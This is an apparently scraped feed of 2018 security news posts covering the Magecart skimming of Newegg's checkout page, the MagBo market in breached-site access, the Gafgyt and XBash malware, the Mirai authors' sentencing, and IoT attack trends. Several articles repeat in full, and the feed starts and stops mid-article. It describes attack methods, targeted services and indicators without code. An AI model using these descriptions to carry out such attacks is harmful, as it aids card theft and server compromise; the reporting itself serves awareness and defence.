“Sens. Ron Wyden (D-Ore.), Rand Paul (R-Ky.), Ed Markey (D-Mass.), Jeanne Shaheen (D-N.H.) and Cory Gardner (R-Colo.) asked Pompeo for an update on what the State Department has done to address its “high risk” designation, and how many cyberattacks the department had been subject to abroad in the last three years.”  reported TheHill.

“Pompeo was asked to respond by Oct. 12.”

Pierluigi Paganini

(Security Affairs – US State Department, Data Breach)

The post US State Department confirms data breach to unclassified email system appeared first on Security Affairs.

Magecart cybercrime group stole customers’ credit cards from Newegg electronics retailer

Magecart hackers have stolen customers’ credit card data from the computer hardware and consumer electronics retailer Newegg.

The Magecart cybercrime group is back, this time the hackers have stolen customers’ credit card data from the computer hardware and consumer electronics retailer Newegg.

Magecart  is active since at least 2015, recently the group hacked the websites of TicketmasterBritish Airways, and Feedify to inject a skimmer script used to siphon users’ payment card data.

behind the Ticketmaster and British Airways data breaches has now victimized popular computer hardware and consumer electronics retailer Newegg.

The security firms Volexity and RiskIQ have conducted a joint investigation on the hack.

Volexity was able to verify the presence of malicious JavaScript code limited to a page on secure.newegg.com presented during the checkout process at Newegg. The malicious code specifically appeared once when moving to the Billing Information page while checking out.reported Volexity.

“This page, located at the URL https://secure.newegg.com/GlobalShopping/CheckoutStep2.aspx, would collect form data, siphoning it back to the attackers over SSL/TLS via the domain neweggstats.com.”

Now Magecart group managed to compromise the Newegg website and steal the credit card details of all customers who made purchases between August 14 and September 18, 2018.

“On August 13th Magecart operators registered a domain called neweggstats.com with the intent of blending in with Newegg’s primary domain, newegg.com.  Registered through Namecheap, the malicious domain initially pointed to a standard parking host.” reads the analysis published by RiskIQ.

“However, the actors changed it to 217.23.4.11 a day later, a Magecart drop server where their skimmer backend runs to receive skimmed credit card information. Similar to the British Airways attack, these actors acquired a certificate issued for the domain by Comodo to lend an air of legitimacy to their page”

NewEgg timeline

Active since at least 2015, the Magecart hacking group registered a domain called neweggstats(dot)com (similar to Newegg’s legitimate domain newegg.com) on August 13 and acquired an SSL certificate issued for the domain by Comodo.

The technique is exactly the one employed for the attack against the British Airways website.

On August 14, the group injected the skimmer code into the payment processing page of the official  retailer website, so when customers made payment the attackers were able to access their payment data and send them to the domain neweggstats(dot)com  they have set up.

newegg skimmer

“The skimmer code is recognizable from the British Airways incident, with the same basecode. All the attackers changed is the name of the form it needs to serialize to obtain payment information and the server to send it to, this time themed with Newegg instead of British Airways.” continues RiskIQ.

“In the case of Newegg, the skimmer was smaller because it only had to serialize one form and therefore condensed down to a tidy 15 lines of script”

Experts noticed that the users of both desktop and mobile applications were affected by the hack.

Customers that made purchases on the Newegg website between August 14 and September 18, 2018, should immediately block their payment card.

Pierluigi Paganini

(Security Affairs – skimmer sript, hacking)

The post Magecart cybercrime group stole customers’ credit cards from Newegg electronics retailer appeared first on Security Affairs.

Security Affairs: Magecart cybercrime group stole customers’ credit cards from Newegg electronics retailer

Magecart hackers have stolen customers’ credit card data from the computer hardware and consumer electronics retailer Newegg.

The Magecart cybercrime group is back, this time the hackers have stolen customers’ credit card data from the computer hardware and consumer electronics retailer Newegg.

Magecart  is active since at least 2015, recently the group hacked the websites of TicketmasterBritish Airways, and Feedify to inject a skimmer script used to siphon users’ payment card data.

behind the Ticketmaster and British Airways data breaches has now victimized popular computer hardware and consumer electronics retailer Newegg.

The security firms Volexity and RiskIQ have conducted a joint investigation on the hack.

Volexity was able to verify the presence of malicious JavaScript code limited to a page on secure.newegg.com presented during the checkout process at Newegg. The malicious code specifically appeared once when moving to the Billing Information page while checking out.reported Volexity.

“This page, located at the URL https://secure.newegg.com/GlobalShopping/CheckoutStep2.aspx, would collect form data, siphoning it back to the attackers over SSL/TLS via the domain neweggstats.com.”

Now Magecart group managed to compromise the Newegg website and steal the credit card details of all customers who made purchases between August 14 and September 18, 2018.

“On August 13th Magecart operators registered a domain called neweggstats.com with the intent of blending in with Newegg’s primary domain, newegg.com.  Registered through Namecheap, the malicious domain initially pointed to a standard parking host.” reads the analysis published by RiskIQ.

“However, the actors changed it to 217.23.4.11 a day later, a Magecart drop server where their skimmer backend runs to receive skimmed credit card information. Similar to the British Airways attack, these actors acquired a certificate issued for the domain by Comodo to lend an air of legitimacy to their page”

NewEgg timeline

Active since at least 2015, the Magecart hacking group registered a domain called neweggstats(dot)com (similar to Newegg’s legitimate domain newegg.com) on August 13 and acquired an SSL certificate issued for the domain by Comodo.

The technique is exactly the one employed for the attack against the British Airways website.

On August 14, the group injected the skimmer code into the payment processing page of the official  retailer website, so when customers made payment the attackers were able to access their payment data and send them to the domain neweggstats(dot)com  they have set up.

newegg skimmer

“The skimmer code is recognizable from the British Airways incident, with the same basecode. All the attackers changed is the name of the form it needs to serialize to obtain payment information and the server to send it to, this time themed with Newegg instead of British Airways.” continues RiskIQ.

“In the case of Newegg, the skimmer was smaller because it only had to serialize one form and therefore condensed down to a tidy 15 lines of script”

Experts noticed that the users of both desktop and mobile applications were affected by the hack.

Customers that made purchases on the Newegg website between August 14 and September 18, 2018, should immediately block their payment card.

Pierluigi Paganini

(Security Affairs – skimmer sript, hacking)

The post Magecart cybercrime group stole customers’ credit cards from Newegg electronics retailer appeared first on Security Affairs.



Security Affairs

Hackers target Newegg with “sophisticated malware”; steal credit card data

By Waqas

At the moment, it is unclear how many Newegg customers have been impacted. The IT security researchers at RiskIQ and Volexity have announced that Newegg Inc., an online retailer of items including computer hardware and consumer electronics has become a victim of a cyber attack in which hackers have stolen credit card details of its customers. According to […]

This is a post from HackRead.com Read the original post: Hackers target Newegg with “sophisticated malware”; steal credit card data

Security Affairs: Access to over 3,000 compromised sites sold on Russian black marketplace MagBo

Security experts at Flashpoint discovered the availability of the access to over 3,000 compromised sites sold on Russian black marketplace MagBo

A new report published by researchers at Flashpoint revealed the availability on an underground hacking forum for Russian-speaking users of access to over 3,000 breached websites.

“Access to approximately 3,000 breached websites has been discovered for sale on a Russian-speaking underground marketplace called MagBo. Access to some of the sites is selling for as low as 50 cents (USD).” reads the report published by Flashpoint.

The earliest advertisements for the MagBo black marketplace were posted in March to a top-tier Russian-language hacking and malware forum. According to the advertising, sellers are offering access to websites that were breached via, PHP shell access, Hosting control access, Domain control access, File Transfer Protocol (FTP) access, Secure Socket Shell (SSH) access, Admin panel access, and Database or Structured Query Language (SQL) access.

Most of the compromised websites are e-commerce sites, but crooks also offered access to websites of organizations in healthcare, legal, education and insurance industries and belonging to government agencies.

According to the experts, most of the compromised servers are from U.S., Russian, or German hosting services. The company reported its findings to law enforcement that are notifying victims.

Magbo compromised servers

Experts found a dozen of vendors on the MagBo black marketplace and hundreds of buyers participate in auctions in order to gain access to breached sites, databases, and administrator panels.

Accesses to compromised websites are precious commodities in the cybercrime underground, crooks can use them to carry out a broad range of illicit activities.

Illicit access to compromised or backdoored sites and databases is used by criminals for a number of activities, ranging from spam campaigns, to fraud, or cryptocurrency mining.” continues the report.

“These compromises have also been used to gain access to corporate networks. This could potentially allow actors to access proprietary internal documents or resources, as well as entry points through which they can drop various malicious payloads. The types of vulnerabilities present and the ways in which they can be exploited depend on the threat actor’s specific capability, motivation, targeting, and goals.”

Sellers are also offering different privilege levels, in some cases they provide “full access permissions” to the compromised sites,  other levels are “abilities to edit content,” and “add your content.”

The prices for compromised websites range from $0.50 USD up to $1,000 USD per access, depending on a website ranking listing various host parameters.

Magbo compromised servers prices.png

High-value targets would have higher prices, for example, to inject payment card sniffers, lower ranking sites are usually used for cryptocurrency mining or spam campaign.

The sellers also offer stolen photocopies of national documents for identity fraud, breached payment wallet access, compromised social media accounts, and Bitcoin mixer or tumbler services.

Pierluigi Paganini

(Security Affairs – MagBo, Darkweb)

The post Access to over 3,000 compromised sites sold on Russian black marketplace MagBo appeared first on Security Affairs.



Security Affairs

Access to over 3,000 compromised sites sold on Russian black marketplace MagBo

Security experts at Flashpoint discovered the availability of the access to over 3,000 compromised sites sold on Russian black marketplace MagBo

A new report published by researchers at Flashpoint revealed the availability on an underground hacking forum for Russian-speaking users of access to over 3,000 breached websites.

“Access to approximately 3,000 breached websites has been discovered for sale on a Russian-speaking underground marketplace called MagBo. Access to some of the sites is selling for as low as 50 cents (USD).” reads the report published by Flashpoint.

The earliest advertisements for the MagBo black marketplace were posted in March to a top-tier Russian-language hacking and malware forum. According to the advertising, sellers are offering access to websites that were breached via, PHP shell access, Hosting control access, Domain control access, File Transfer Protocol (FTP) access, Secure Socket Shell (SSH) access, Admin panel access, and Database or Structured Query Language (SQL) access.

Most of the compromised websites are e-commerce sites, but crooks also offered access to websites of organizations in healthcare, legal, education and insurance industries and belonging to government agencies.

According to the experts, most of the compromised servers are from U.S., Russian, or German hosting services. The company reported its findings to law enforcement that are notifying victims.

Magbo compromised servers

Experts found a dozen of vendors on the MagBo black marketplace and hundreds of buyers participate in auctions in order to gain access to breached sites, databases, and administrator panels.

Accesses to compromised websites are precious commodities in the cybercrime underground, crooks can use them to carry out a broad range of illicit activities.

Illicit access to compromised or backdoored sites and databases is used by criminals for a number of activities, ranging from spam campaigns, to fraud, or cryptocurrency mining.” continues the report.

“These compromises have also been used to gain access to corporate networks. This could potentially allow actors to access proprietary internal documents or resources, as well as entry points through which they can drop various malicious payloads. The types of vulnerabilities present and the ways in which they can be exploited depend on the threat actor’s specific capability, motivation, targeting, and goals.”

Sellers are also offering different privilege levels, in some cases they provide “full access permissions” to the compromised sites,  other levels are “abilities to edit content,” and “add your content.”

The prices for compromised websites range from $0.50 USD up to $1,000 USD per access, depending on a website ranking listing various host parameters.

Magbo compromised servers prices.png

High-value targets would have higher prices, for example, to inject payment card sniffers, lower ranking sites are usually used for cryptocurrency mining or spam campaign.

The sellers also offer stolen photocopies of national documents for identity fraud, breached payment wallet access, compromised social media accounts, and Bitcoin mixer or tumbler services.

Pierluigi Paganini

(Security Affairs – MagBo, Darkweb)

The post Access to over 3,000 compromised sites sold on Russian black marketplace MagBo appeared first on Security Affairs.

Dissecting the first Gafgyt bot implementing the “Non Un-Packable” NUP technique

Experts at the CSE Cybsec Z-Lab have found a Gafgyt variant implementing the “Non Un-Packable” technique recently presented in a cyber security conference

A new variant of the Gafgyt botnet is spreading in the last hours and experts of the CSE Cybsec Z-Lab have found it with the support of the Italian cyber security experts @Odisseus and GranetMan.

The new variant analyzed in the report published by the experts was found on a system resolving the IP address owned by the Italian ISP Aruba. This specific version implements some advanced packing techniques that make the static analysis much harder.

We downloaded the sample directly from the compromised server, we found four samples of the Gafgyt variant that were already compiled for the specific architecture, X86-64, X86-32, MIPS, ARM.

The sample shows the same behavior associated with the classic Gafgyt botnet but we immediately noticed a distinctive feature, the implementation of “Non Un-Packable” NUP technique.

Malware Must Die leader @unixfreaxjp presented the sophisticated technique at the recent Radare conference (r2con2018) in his talk about the “Non Un-Packable” packer.

According to the experts the “Non Un-Packable” ELF was around since a few months before the talk and our discovery confirms that malware developers started adopting it.

The report includes a detailed analysis of the malware.

You can download the full ZLAB Malware Analysis Report at the following URL:

http://csecybsec.com/download/zlab/20180919_CSE_Gafgyt_v2.pdf

 

Pierluigi Paganini

(Security Affairs – Gafgyt, malware)

The post Dissecting the first Gafgyt bot implementing the “Non Un-Packable” NUP technique appeared first on Security Affairs.

Security Affairs: Dissecting the first Gafgyt bot implementing the “Non Un-Packable” NUP technique

Experts at the CSE Cybsec Z-Lab have found a Gafgyt variant implementing the “Non Un-Packable” technique recently presented in a cyber security conference

A new variant of the Gafgyt botnet is spreading in the last hours and experts of the CSE Cybsec Z-Lab have found it with the support of the Italian cyber security experts @Odisseus and GranetMan.

The new variant analyzed in the report published by the experts was found on a system resolving the IP address owned by the Italian ISP Aruba. This specific version implements some advanced packing techniques that make the static analysis much harder.

We downloaded the sample directly from the compromised server, we found four samples of the Gafgyt variant that were already compiled for the specific architecture, X86-64, X86-32, MIPS, ARM.

The sample shows the same behavior associated with the classic Gafgyt botnet but we immediately noticed a distinctive feature, the implementation of “Non Un-Packable” NUP technique.

Malware Must Die leader @unixfreaxjp presented the sophisticated technique at the recent Radare conference (r2con2018) in his talk about the “Non Un-Packable” packer.

According to the experts the “Non Un-Packable” ELF was around since a few months before the talk and our discovery confirms that malware developers started adopting it.

The report includes a detailed analysis of the malware.

You can download the full ZLAB Malware Analysis Report at the following URL:

http://csecybsec.com/download/zlab/20180919_CSE_Gafgyt_v2.pdf

 

Pierluigi Paganini

(Security Affairs – Gafgyt, malware)

The post Dissecting the first Gafgyt bot implementing the “Non Un-Packable” NUP technique appeared first on Security Affairs.



Security Affairs

California man may get 6 months in prison for uploading Deadpool on Facebook

By Carolina

It is quite unlikely that somebody would be naïve enough to upload a copy of a newly released movie on his Facebook page with his real name since this would lead the law enforcement straight to the person, that too, in no time. However, it seems that there is one such person and his name […]

This is a post from HackRead.com Read the original post: California man may get 6 months in prison for uploading Deadpool on Facebook

Mirai Botnet Creators Helping FBI Fight Cybercrime to Stay Out of Jail

Three young hackers who were sentenced late last year for creating and spreading the notorious Mirai botnet are now helping the FBI to investigate other "complex" cybercrime cases in return to avoid their lengthy prison terms. Paras Jha, 21 from New Jersey, Josiah White, 20 from Washington, and Dalton Norman, 21 from Louisiana, plead guilty in December 2017 to multiple charges for their role

Security Affairs: Mirai authors avoid the jail by helping US authorities in other investigations

Three men who admitted to being the authors of the Mirai botnet avoided the jail after helping the FBI in other cybercrime investigations.

I’m following the evolution of Mirai botnet since MalwareMustDie shared with me the findings of its investigation in August 2016.

Now three individuals who admitted to being the authors of the infamous botnet avoided the jail after helping feds in another cybercrime investigations.

The three men, Josiah White (21) of Washington, Pennsylvania; Paras Jha (22), of Fanwood, New Jersey, and Dalton Norman (22), of Metairie, Louisiana, pleaded guilty in December 2017 to developing and running the dreaded Mirai botnet that was involved in several massive DDoS attacks.

The identification and conviction of the three men is the result of an international joint cooperation between government agencies in the US, UK, Northern Ireland, and France, and private firms, including Palo Alto Networks, Google, Cloudflare, Coinbase, Flashpoint, Oath, Qihoo 360 and Akamai.

According to the plea agreements, White developed the Telnet scanner component used by Mirai, Jha created the botnet’s core infrastructure and the malware’s remote control features, while Norman developed new exploits.

Jha, who goes online with the moniker “Anna-senpai” leaked the source code for the Mirai malware on a criminal forum, allowing other threat actors to use it and making hard the attribution of the attacks.

Jha also pleaded guilty to carrying out multiple DDoS attacks against his alma mater Rutgers University between November 2014 and September 2016, before creating the Mirai botnet. According to the authorities, the three earned roughly $180,000 through their click fraud scheme.

The Mirai case was investigated by the FBI Field Office in Anchorage, and the Chief U.S. District Judge in Alaska sentenced the men.

“U.S. Attorney Bryan Schroder announced today that three defendants have been sentenced for their roles in creating and operating two botnets, which targeted “Internet of Things” (IoT) devices.  Paras Jha, 22, of Fanwood, New Jersey; Josiah White, 21, of Washington, Pennsylvania; and Dalton Norman, 22, of Metairie, Louisiana, were sentenced today by Chief U.S. District Judge Timothy M. Burgess.” states the press release published by the DoJ.

“On Dec. 8, 2017, Jha, White, and Norman pleaded guilty to criminal Informations in the District of Alaska charging them each with conspiracy to violate the Computer Fraud & Abuse Act in operating the Mirai Botnet.  Jha and Norman also pleaded guilty to two counts each of the same charge, one in relation to the Mirai botnet and the other in relation to the Clickfraud botnet.”

On Tuesday, the DoJ revealed on Tuesday that each of the men was sentenced to five years of probation and 2,500 hours of community service.

The judges required them to repay $127,000, and they have voluntarily handed over huge amounts of cryptocurrency that the authorities seized as part of the investigation on the botnet.

mirai

The three men have “cooperated extensively” with the authorities helping the FBI on complex cybercrime investigations before the sentence. The trio will continue to offer their support to the feds.

“After cooperating extensively with the FBI, Jha, White, and Norman were each sentenced to serve a five-year period of probation, 2,500 hours of community service, ordered to pay restitution in the amount of $127,000, and have voluntarily abandoned significant amounts of cryptocurrency seized during the course of the investigation.” continues the press release.

” As part of their sentences, Jha, White, and Norman must continue to cooperate with the FBI on cybercrime and cybersecurity matters, as well as continued cooperation with and assistance to law enforcement and the broader research community.”

Pierluigi Paganini

(Security Affairs – Mirai, botnet)

The post Mirai authors avoid the jail by helping US authorities in other investigations appeared first on Security Affairs.



Security Affairs

Mirai authors avoid the jail by helping US authorities in other investigations

Three men who admitted to being the authors of the Mirai botnet avoided the jail after helping the FBI in other cybercrime investigations.

I’m following the evolution of Mirai botnet since MalwareMustDie shared with me the findings of its investigation in August 2016.

Now three individuals who admitted to being the authors of the infamous botnet avoided the jail after helping feds in another cybercrime investigations.

The three men, Josiah White (21) of Washington, Pennsylvania; Paras Jha (22), of Fanwood, New Jersey, and Dalton Norman (22), of Metairie, Louisiana, pleaded guilty in December 2017 to developing and running the dreaded Mirai botnet that was involved in several massive DDoS attacks.

The identification and conviction of the three men is the result of an international joint cooperation between government agencies in the US, UK, Northern Ireland, and France, and private firms, including Palo Alto Networks, Google, Cloudflare, Coinbase, Flashpoint, Oath, Qihoo 360 and Akamai.

According to the plea agreements, White developed the Telnet scanner component used by Mirai, Jha created the botnet’s core infrastructure and the malware’s remote control features, while Norman developed new exploits.

Jha, who goes online with the moniker “Anna-senpai” leaked the source code for the Mirai malware on a criminal forum, allowing other threat actors to use it and making hard the attribution of the attacks.

Jha also pleaded guilty to carrying out multiple DDoS attacks against his alma mater Rutgers University between November 2014 and September 2016, before creating the Mirai botnet. According to the authorities, the three earned roughly $180,000 through their click fraud scheme.

The Mirai case was investigated by the FBI Field Office in Anchorage, and the Chief U.S. District Judge in Alaska sentenced the men.

“U.S. Attorney Bryan Schroder announced today that three defendants have been sentenced for their roles in creating and operating two botnets, which targeted “Internet of Things” (IoT) devices.  Paras Jha, 22, of Fanwood, New Jersey; Josiah White, 21, of Washington, Pennsylvania; and Dalton Norman, 22, of Metairie, Louisiana, were sentenced today by Chief U.S. District Judge Timothy M. Burgess.” states the press release published by the DoJ.

“On Dec. 8, 2017, Jha, White, and Norman pleaded guilty to criminal Informations in the District of Alaska charging them each with conspiracy to violate the Computer Fraud & Abuse Act in operating the Mirai Botnet.  Jha and Norman also pleaded guilty to two counts each of the same charge, one in relation to the Mirai botnet and the other in relation to the Clickfraud botnet.”

On Tuesday, the DoJ revealed on Tuesday that each of the men was sentenced to five years of probation and 2,500 hours of community service.

The judges required them to repay $127,000, and they have voluntarily handed over huge amounts of cryptocurrency that the authorities seized as part of the investigation on the botnet.

mirai

The three men have “cooperated extensively” with the authorities helping the FBI on complex cybercrime investigations before the sentence. The trio will continue to offer their support to the feds.

“After cooperating extensively with the FBI, Jha, White, and Norman were each sentenced to serve a five-year period of probation, 2,500 hours of community service, ordered to pay restitution in the amount of $127,000, and have voluntarily abandoned significant amounts of cryptocurrency seized during the course of the investigation.” continues the press release.

” As part of their sentences, Jha, White, and Norman must continue to cooperate with the FBI on cybercrime and cybersecurity matters, as well as continued cooperation with and assistance to law enforcement and the broader research community.”

Pierluigi Paganini

(Security Affairs – Mirai, botnet)

The post Mirai authors avoid the jail by helping US authorities in other investigations appeared first on Security Affairs.

Keeping Your Personal Information Safe

By Vasilii Chekalov EveryCloud, According to a study by Statista in March of 2018, 63% of respondents expressed concern that they would be hacked in the next five years. 60%

The post Keeping Your Personal Information Safe appeared first on The Cyber Security Place.

Evolution of threat landscape for IoT devices – H1 2018

Security experts from Kaspersky have published an interesting report on the new trends in the IoT threat landscape. What is infecting IoT devices and how?

The researchers set up a honeypot to collect data on infected IoT devices, the way threat actors infect IoT devices and what families of malware are involved.

The first data that emerged from the study is that threat actors continue to look at the IoT devices with increasing interest. In the first six months of 2018, the experts observed a number of malware samples that was up three times as many samples targeting IoT devices as in the whole of 2017. In 2017 there were ten times more than in 2016.

IoT devices attacks

In the first half of 2018, researchers at Kaspersky Lab said that the most popular attack vector against IoT devices remains cracking Telnet passwords (75,40%), followed by cracking SSH passwords (11,59%).

Mirai dominates the IoT threat landscape, 20.9% of IoT devices were infected by this malicious code, other prominent malware are Hajime (5.89%) and Gafgyt.

Top 10 countries from which Kaspersky traps were hit by Telnet password attacks is led by Brazil, China, and Japan.

“As we see, in Q2 2018 the leader by number of unique IP addresses from which Telnet password attacks originated was Brazil (23%). Second place went to China (17%). Russia in our list took 4th place (7%).” reads the report.

“Overall for the period January 1 – July 2018, our Telnet honeypot registered more than 12 million attacks from 86,560 unique IP addresses, and malware was downloaded from 27,693 unique IP addresses.”

Experts pointed out that infected MikroTik routers made up 37.23 percent of all the data collected, followed by TP-Link that accounted for 9.07%.

MikroTik devices running under RouterOS are targeted by malicious code that includes the exploit for the Chimay-Red vulnerability.

The Chimay Red hacking tool leverages 2 exploits, the Winbox Any Directory File Read (CVE-2018-14847) and Webfig Remote Code Execution Vulnerability.

MikroTik devices were involved in several campaigns in the past months, including the VPNfilter botnet that infected almost a million routers in more than 50 countries

Iot devices

Experts highlighted that IoT malware is increasing both in quantity and quality.

“More and more exploits are being weaponized by cybercriminals, and infected devices are used to steal personal data and mine cryptocurrencies, on top of traditional DDoS attacks.” concludes Kaspersky.

Let me suggest to read to read the report, is full of interesting data.

Pierluigi Paganini

(Security Affairs – IoT devices, hacking)

The post Evolution of threat landscape for IoT devices – H1 2018 appeared first on Security Affairs.

Security Affairs: Evolution of threat landscape for IoT devices – H1 2018

Security experts from Kaspersky have published an interesting report on the new trends in the IoT threat landscape. What is infecting IoT devices and how?

The researchers set up a honeypot to collect data on infected IoT devices, the way threat actors infect IoT devices and what families of malware are involved.

The first data that emerged from the study is that threat actors continue to look at the IoT devices with increasing interest. In the first six months of 2018, the experts observed a number of malware samples that was up three times as many samples targeting IoT devices as in the whole of 2017. In 2017 there were ten times more than in 2016.

IoT devices attacks

In the first half of 2018, researchers at Kaspersky Lab said that the most popular attack vector against IoT devices remains cracking Telnet passwords (75,40%), followed by cracking SSH passwords (11,59%).

Mirai dominates the IoT threat landscape, 20.9% of IoT devices were infected by this malicious code, other prominent malware are Hajime (5.89%) and Gafgyt.

Top 10 countries from which Kaspersky traps were hit by Telnet password attacks is led by Brazil, China, and Japan.

“As we see, in Q2 2018 the leader by number of unique IP addresses from which Telnet password attacks originated was Brazil (23%). Second place went to China (17%). Russia in our list took 4th place (7%).” reads the report.

“Overall for the period January 1 – July 2018, our Telnet honeypot registered more than 12 million attacks from 86,560 unique IP addresses, and malware was downloaded from 27,693 unique IP addresses.”

Experts pointed out that infected MikroTik routers made up 37.23 percent of all the data collected, followed by TP-Link that accounted for 9.07%.

MikroTik devices running under RouterOS are targeted by malicious code that includes the exploit for the Chimay-Red vulnerability.

The Chimay Red hacking tool leverages 2 exploits, the Winbox Any Directory File Read (CVE-2018-14847) and Webfig Remote Code Execution Vulnerability.

MikroTik devices were involved in several campaigns in the past months, including the VPNfilter botnet that infected almost a million routers in more than 50 countries

Iot devices

Experts highlighted that IoT malware is increasing both in quantity and quality.

“More and more exploits are being weaponized by cybercriminals, and infected devices are used to steal personal data and mine cryptocurrencies, on top of traditional DDoS attacks.” concludes Kaspersky.

Let me suggest to read to read the report, is full of interesting data.

Pierluigi Paganini

(Security Affairs – IoT devices, hacking)

The post Evolution of threat landscape for IoT devices – H1 2018 appeared first on Security Affairs.



Security Affairs

Dark Web: US court seizes assets and properties of deceased AlphaBay operator

By Waqas

AlphaBay was one of the largest dark web marketplaces – In 2017, its admin Alexandre Cazes committed suicide in a Thai prison. The Fresno Division of the U.S. District Court for the Eastern District of California has finally concluded a 14-month long civil forfeiture case and allowed seizure of property and assets of a Canadian national Alexandre Cazes […]

This is a post from HackRead.com Read the original post: Dark Web: US court seizes assets and properties of deceased AlphaBay operator

Hackers disrupt UK’s Bristol Airport flight info screens after ransomware attack

By Uzair Amir

The ransomware attack disrupted the screens for two days.  In a nasty ransomware attack, flight information screens at the United Kingdom’s Bristol airport were taken over and hijacked by malicious hackers on September 15th Friday morning. The ransomware attack forced the airport staff to go manual by using whiteboards and hand-written information to assist passengers regarding their […]

This is a post from HackRead.com Read the original post: Hackers disrupt UK’s Bristol Airport flight info screens after ransomware attack

Hackers as Heroes: How Ethical Hacking is Changing the Industry

Hackers all around the world have long been portrayed in media and pop culture as the bad guys. Society is taught to see them as cyber-criminals and outliers who seek

The post Hackers as Heroes: How Ethical Hacking is Changing the Industry appeared first on The Cyber Security Place.

Security Affairs: New XBash malware combines features from ransomware, cryptocurrency miners, botnets, and worms

Palo Alto Network researchers discovered a new malware, tracked as XBash, that combines features from ransomware, cryptocurrency miners, botnets, and worms

Security researchers at Palo Alto Networks have discovered a new piece of malware, dubbed XBash piece that is targeting both Linux and Microsoft Windows servers.

Xbash was developed using Python, then the authors converted into self-contained Linux ELF executables by abusing the legitimate tool PyInstaller for distribution.

The malicious code combines features from different families of malware such as ransomware, cryptocurrency miners, botnets, and worms.

“Xbash has ransomware and coinmining capabilities. It also has self-propagating capabilities (meaning it has worm-like characteristics similar to WannaCry or Petya/NotPetya).” reads the analysis published by Palo Alto Networks.

“It also has capabilities not currently implemented that, when implemented, could enable it to spread very quickly within an organizations’ network (again, much like WannaCry or Petya/NotPetya).”

The malicious code was attributed to a popular crime gang tracked as the Iron Group.

The Iron cybercrime group has been active since at least 2016, is known for the Iron ransomware but across the years it is built various strain of malware, including backdoors, cryptocurrency miners, and ransomware to target both mobile and desktop systems.

“In April 2018, while monitoring public data feeds, we noticed an interesting and previously unknown backdoor using HackingTeam’s leaked RCS source code.” states the report published by Intezer

“We discovered that this backdoor was developed by the Iron cybercrime group, the same group behind the Iron ransomware (rip-off Maktub ransomware recently discovered by Bart Parys), which we believe has been active for the past 18 months.”

Thousands of victims have been infected by malware used by the crime gang.

Now the experts from Palo Alto Networks discovered the new XBash malware strain that combines botnet, coinmining, ransomware, and self-propagation. The botnet and ransomware features are observed in infections of Linux systems, while a coinminer behavior was seen in infections of the Windows servers.

The Xbash authors have implemented scanning capabilities used by the malware to search for vulnerable servers online. The malicious code search for unpatched web applications that are vulnerable to a series of known exploits or to brute force attack with a dictionary of default credentials.

“When Xbash finds a destination has Hadoop, Redis or ActiveMQ running, it will also attempt to exploit the service for self-propagation.” continues the report.

“Three known vulnerabilities are targeted:

  1. Hadoop YARN ResourceManager unauthenticated command execution, which was first disclosed in October 2016 and has no CVE number assigned.
  2. Redis arbitrary file write and remote command execution, which was first disclosed in October 2015 and has no CVE number assigned. This is shown below in Figure 6.
  3. ActiveMQ arbitrary file write vulnerability, CVE-2016-3088.”

 

The malware can infect Windows systems, only after the compromise of a vulnerable Redis server.

The scanner component also scans the Internet for servers that run services that have been left online exposed without a password or are using weak credentials. The scanners target web servers (HTTP), VNC, MariaDB, MySQL, PostgreSQL, Redis, MongoDB, Oracle DB, CouchDB, ElasticSearch, Memcached, FTP, Telnet, RDP, UPnP/SSDP, NTP, DNS, SNMP, LDAP, Rexec, Rlogin, Rsh, and Rsync.

Hackers attempt to monetize their efforts through coin-mining activities on Windows systems or with ransomware based attacks on Linux servers running database services.

The XBash component will scan and delete MySQL, MongoDB, and PostgreSQL databases and drops a ransom asking for the payment of 0.02 Bitcoin ($125) to recover them.

Xbash

Unfortunately, victims will never recover their data because the malware wipe data and not back it up.

“we have observed three different bitcoin wallet addresses hard-coded in the Xbash samples. Since May 2018, there are 48 incoming transactions to these wallets with total income of about 0.964 bitcoins (about US$6,000 at the time of this writing).” continues the analysis.

“the funds are being withdrawn, showing us that the attackers are actively collecting their ransom.”

Experts noticed in all versions of Xbash the presence of a Python class named “LanScan” used to target enterprise networks.  The class allows to get local intranet information, generate a list of all IP addresses within the same subnet, and to perform port scanning to all these IPs

The code is still not active in the malware, likely crooks are working on its development.

Experts believe XBash will continue to evolve, for example including the miner component for Linux servers as well.

Further info, including IoCs, are reported in the analysis published by the experts.

Pierluigi Paganini

(Security Affairs – malware, cybercrime)

The post New XBash malware combines features from ransomware, cryptocurrency miners, botnets, and worms appeared first on Security Affairs.



Security Affairs

New XBash malware combines features from ransomware, cryptocurrency miners, botnets, and worms

Palo Alto Network researchers discovered a new malware, tracked as XBash, that combines features from ransomware, cryptocurrency miners, botnets, and worms

Security researchers at Palo Alto Networks have discovered a new piece of malware, dubbed XBash piece that is targeting both Linux and Microsoft Windows servers.

Xbash was developed using Python, then the authors converted into self-contained Linux ELF executables by abusing the legitimate tool PyInstaller for distribution.

The malicious code combines features from different families of malware such as ransomware, cryptocurrency miners, botnets, and worms.

“Xbash has ransomware and coinmining capabilities. It also has self-propagating capabilities (meaning it has worm-like characteristics similar to WannaCry or Petya/NotPetya).” reads the analysis published by Palo Alto Networks.

“It also has capabilities not currently implemented that, when implemented, could enable it to spread very quickly within an organizations’ network (again, much like WannaCry or Petya/NotPetya).”

The malicious code was attributed to a popular crime gang tracked as the Iron Group.

The Iron cybercrime group has been active since at least 2016, is known for the Iron ransomware but across the years it is built various strain of malware, including backdoors, cryptocurrency miners, and ransomware to target both mobile and desktop systems.

“In April 2018, while monitoring public data feeds, we noticed an interesting and previously unknown backdoor using HackingTeam’s leaked RCS source code.” states the report published by Intezer

“We discovered that this backdoor was developed by the Iron cybercrime group, the same group behind the Iron ransomware (rip-off Maktub ransomware recently discovered by Bart Parys), which we believe has been active for the past 18 months.”

Thousands of victims have been infected by malware used by the crime gang.

Now the experts from Palo Alto Networks discovered the new XBash malware strain that combines botnet, coinmining, ransomware, and self-propagation. The botnet and ransomware features are observed in infections of Linux systems, while a coinminer behavior was seen in infections of the Windows servers.

The Xbash authors have implemented scanning capabilities used by the malware to search for vulnerable servers online. The malicious code search for unpatched web applications that are vulnerable to a series of known exploits or to brute force attack with a dictionary of default credentials.

“When Xbash finds a destination has Hadoop, Redis or ActiveMQ running, it will also attempt to exploit the service for self-propagation.” continues the report.

“Three known vulnerabilities are targeted:

  1. Hadoop YARN ResourceManager unauthenticated command execution, which was first disclosed in October 2016 and has no CVE number assigned.
  2. Redis arbitrary file write and remote command execution, which was first disclosed in October 2015 and has no CVE number assigned. This is shown below in Figure 6.
  3. ActiveMQ arbitrary file write vulnerability, CVE-2016-3088.”

 

The malware can infect Windows systems, only after the compromise of a vulnerable Redis server.
